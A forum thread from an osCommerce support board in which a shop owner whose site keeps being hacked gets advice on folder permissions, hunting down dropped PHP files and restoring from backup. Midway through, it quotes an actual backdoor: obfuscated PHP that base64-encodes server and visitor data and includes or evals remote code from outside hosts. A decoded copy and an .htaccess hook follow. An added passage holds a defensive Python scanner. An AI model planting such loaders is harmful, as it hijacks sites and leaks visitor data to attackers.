Forestshopkeeper Posted October 28, 2008 My site has been hacked twice in the past two weeks. I have had a good backup, but someone is changing my index file. Any suggestions on how to stop this? The permissions are set for user to read and write and for everyone else to read. Thanks Jim
php_Guy Posted October 28, 2008 My site has been hacked twice in the past two weeks. I have had a good backup, but someone is changing my index file. Any suggestions on how to stop this? The permissions are set for user to read and write and for everyone else to read. Thanks Jim Do you have any directories set at 777? Set them to 755. Files should be 644. Also, do not rely on the built-in password protection for admin. Use .htpasswd. You can set it up manually or through your cPanel. Also be sure to install these mods. That should take care of the problem.
germ Posted October 28, 2008 Your images folder still has hack PHP files in it (looks to me like). If it's set at 777 permissions, there's probably your weak point. Folder permissions should not be higher than 755. File permissions probably not higher than 644. If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there >
php_Guy Posted October 28, 2008 After a hack like that, it's best to delete the entire site and reinstall from a known-good backup. Otherwise you will need to manually go through your site and look for new folders/files and check existing files for modifications. Re-installing a backup is much faster and easier.
Forestshopkeeper Posted October 28, 2008 Author Your images folder still has hack PHP files in it (looks to me like). If it's set at 777 permissions, there's probably your weak point. Folder permissions should not be higher than 755. File permissions probably not higher than 644. Yes, it was at 777. I changed it to 755. I am not sure what "hack php files" you are referencing. I did find one .php file and I removed it. I also got rid of the dummy images from the osC download. Jim
Forestshopkeeper Posted October 28, 2008 Author Do you have any directories set at 777? Set them to 755. Files should be 644. Also, do not rely on the built-in password protection for admin. Use .htpasswd. You can set it up manually or through your cPanel. Also be sure to install these mods. That should take care of the problem. Thanks. I am working on the mods. I set the folders at 755. Files are 644. Jim
Forestshopkeeper Posted October 28, 2008 Author After a hack like that, it's best to delete the entire site and reinstall from a known-good backup. Otherwise you will need to manually go through your site and look for new folders/files and check existing files for modifications. Re-installing a backup is much faster and easier. Thanks for the info. Jim
Forestshopkeeper Posted October 28, 2008 Author Yes, it was at 777. I changed it to 755. I am not sure what "hack php files" you are referencing. I did find one .php file and I removed it. I also got rid of the dummy images from the osC download. Jim Now when I try to upload images through the osC admin panel, I get an error saying the folder is not writable. Back to 777. Jim
Forestshopkeeper Posted October 28, 2008 Author Thanks. I am working on the mods. I set the folders at 755. Files are 644. Jim Now when I try to upload images through the osC admin panel, I get an error saying the folder is not writable. Back to 777. Jim
Forestshopkeeper Posted October 28, 2008 Author Thanks. I am working on the mods. I set the folders at 755. Files are 644. Jim Is there any particular order to put in these mods? Do I need all of them? Are there any known conflicts between them? Jim
♥Vger Posted October 28, 2008 If your images folder does not allow uploads unless set to 777 then do that but just for the upload and then reset to 755. Either that or get your hosting company to sort out their security. Vger
Forestshopkeeper Posted October 29, 2008 Author If your images folder does not allow uploads unless set to 777 then do that but just for the upload and then reset to 755. Either that or get your hosting company to sort out their security. Vger That makes sense for now till I can sort it out. Jim
germ Posted October 29, 2008 Recheck your images folder for hack PHP files: 019667.php 23-May-2008 22:30 1k, 1019667.php 24-Aug-2008 01:55 1k, 19667.php 20-Mar-2008 02:59 1k
php_Guy Posted October 29, 2008 I generally find it easier to upload images via FTP and add/change products via the easypopulate contribution. That way you can leave the images folder set to 755. Also, deleting the new .php files you find may not solve your problem. Once they got in, they may have edited files to enable another means of access. That's why I suggested deleting everything and restoring a backup. At the least check all your .htaccess files, .htpasswd files if you have any, and index.php. Good luck
Forestshopkeeper Posted October 29, 2008 Author Recheck your images folder for hack PHP files: 019667.php 23-May-2008 22:30 1k, 1019667.php 24-Aug-2008 01:55 1k, 19667.php 20-Mar-2008 02:59 1k Thanks. I don't know where they came from, but they are gone now. Jim
germ Posted October 29, 2008 They look like the same type of hack that got me last March. If so, it's not a destructive nor information-stealing type of hack. It's a "pay per click" scam. They stick these bogus PHP files around, then seed search engines with links to them, then just sit back and rake in the dough (so I've been told). Personally, I think deleting everything and reinstalling at this point is a bit premature and going overboard. Just be sure all the folder permissions are no higher than 755 and keep an eye on things for a while. If no more hack files show up, you should be OK. By the way, better check your admin folder too, especially your backups folder for your database. They got me there, too.
Forestshopkeeper Posted October 29, 2008 Author I generally find it easier to upload images via FTP and add/change products via the easypopulate contribution. That way you can leave the images folder set to 755. Also, deleting the new .php files you find may not solve your problem. Once they got in, they may have edited files to enable another means of access. That's why I suggested deleting everything and restoring a backup. At the least check all your .htaccess files, .htpasswd files if you have any, and index.php. Good luck I am looking at some .htaccess files in my admin folder. This script is in a file called 220009.php:

<? error_reporting(0);
$s="e";
$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);
$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);
$str=base64_encode($a).".".base64_encode($B).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j);
if ((include(base64_decode("aHR0cDovLw==").base64_decode("YS5yc2RjcmFmdC53cw==")."/?".$str)));
else if (include(base64_decode("aHR0cDovLw==").base64_decode("YWQucnVud2ViLmluZm8=")."/?".$str));
else eval(file_get_contents(base64_decode("aHR0cDovLzcueG1sZGF0YS5pbmZvLz8=").$str));
?>

This is what is in the .htaccess file in my backups folder:

Options -MultiViews
ErrorDocument 404 //admin/backups/220009.php

In 2007 I did not even have a backups folder, and now I send everything to my computer. I am pulling these files for now and setting the permissions to 755 on these folders. What else can I do? Jim
germ Posted October 29, 2008 Both of the files you posted about in the backups folder are bad. Delete them.
Forestshopkeeper Posted October 29, 2008 Author Both of the files you posted about in the backups folder are bad. Delete them. Thanks. I think I have found everything now. The website is working with no threats identified. I hope to get started on the mods today. Jim
Forestshopkeeper Posted November 3, 2008 Author Thanks. I think I have found everything now. The website is working with no threats identified. I hope to get started on the mods today. Jim Can you tell me what that particular script does? I can't make sense of it, but then, I am not a coder. Jim
Forestshopkeeper Posted November 3, 2008 Author Both of the files you posted about in the backups folder are bad. Delete them. Can you tell me what that particular script does? I can't make sense of it, but then, I am not a coder. Jim
germ Posted November 3, 2008 I can't tell you what it does because the main payload(s) rely on something from another server. All I can do is make it easier to read (reformatted, decoded, commented, and simplified as much as possible):

<? error_reporting(0);
$s="e";
// get info about this site/page/server
$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);
$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);
// encode it
$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j);
if ("http://a.rsdcraft.ws/?".$str);
else if ("http://ad.runweb.info/?".$str);
else eval("http://7.xmldata.info/?".$str);
?>
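A defender-side sweep for the four symptoms this thread turns up (a 777 folder, PHP files sitting in images/ or admin/backups/, an .htaccess ErrorDocument that hands 404s to a PHP file, and a loader that builds its include()/eval() target with base64_decode()). This is an added example, not code from the thread or from osCommerce; the rule names, the directory list and the small sample tree it builds for itself are assumptions for illustration.

```python
import os, re, stat, tempfile

# Heuristics from the thread: PHP where only images or DB backups belong, 777 dirs,
# .htaccess handing 404s to a PHP file, and include()/eval() built with base64_decode().
NO_PHP_DIRS = ("images", os.path.join("admin", "backups"))
HTACCESS_RE = re.compile(r"^\s*ErrorDocument\s+\d{3}\s+\S*\.php", re.I | re.M)
LOADER_RE = re.compile(r"\b(?:include|require|eval|file_get_contents)\s*\(\s*base64_decode\s*\(")

def scan_webroot(root):
    """Walk the webroot and return a sorted list of (rule, relative_path) findings."""
    findings = []
    for dirpath, _dirs, filenames in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root)
        rel_dir = "" if rel_dir == "." else rel_dir
        if os.stat(dirpath).st_mode & stat.S_IWOTH:  # o+w: any local user can drop files here
            findings.append(("world_writable_dir", rel_dir or "."))
        in_upload_dir = any(rel_dir == d or rel_dir.startswith(d + os.sep) for d in NO_PHP_DIRS)
        for name in filenames:
            rel = os.path.join(rel_dir, name)
            with open(os.path.join(dirpath, name), errors="replace") as fh:
                body = fh.read()
            if name == ".htaccess" and HTACCESS_RE.search(body):
                findings.append(("htaccess_errordoc_php", rel))
            if name.lower().endswith(".php"):
                if in_upload_dir:
                    findings.append(("php_in_upload_dir", rel))
                if LOADER_RE.search(body):
                    findings.append(("base64_remote_loader", rel))
    return sorted(findings)

def build_sample_site():
    """Constructed osCommerce-like tree reproducing the thread's findings (not real files)."""
    root = tempfile.mkdtemp(prefix="osc_")
    for d in ("images", "admin", os.path.join("admin", "backups")):
        os.makedirs(os.path.join(root, d), exist_ok=True)
        os.chmod(os.path.join(root, d), 0o755)
    os.chmod(os.path.join(root, "images"), 0o777)  # the setting the upload code forced Jim back to
    files = {
        os.path.join("images", "19667.php"):
            '<? include(base64_decode("aHR0cDovLw==")."/?".$_SERVER["HTTP_HOST"]); ?>',
        os.path.join("admin", "backups", ".htaccess"):
            "Options -MultiViews\nErrorDocument 404 //admin/backups/220009.php\n",
        os.path.join("admin", "backups", "220009.php"):
            '<? eval(file_get_contents(base64_decode("aHR0cDovLw=="))); ?>',
        "index.php": "<?php echo 'shop'; ?>",  # benign file: must produce no finding
    }
    for rel, body in files.items():
        with open(os.path.join(root, rel), "w") as fh:
            fh.write(body)
    return root
```

Run scan_webroot() against the real document root after restoring from a known-good backup; anything it flags under images/ or admin/backups/ is worth diffing against that backup before deleting, since php_Guy's point above is that the dropped files may not be the only change.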
php_Guy Posted November 3, 2008 Personally, I think deleting everything and reinstalling at this point is a bit premature and going overboard. No no.. I would not delete and reinstall. It would be easier to manually inspect every file in every folder. I was suggesting that he delete everything and re-install his last backup. And preferably, that backup should be a set of working files that have never actually resided on the webspace. IMO, everyone should modify files locally and then upload them to their server and occasionally make a copy of those local files and set them aside as a snapshot just for this sort of thing. That way, you can delete the entire site and reload a current set of files. It should take less than half an hour even on a slow connection. Unfortunately, some people modify the files live on the server and don't have local files. Those that do back up (i.e., download a full set of files from the server) have a backup of files that could have been infected.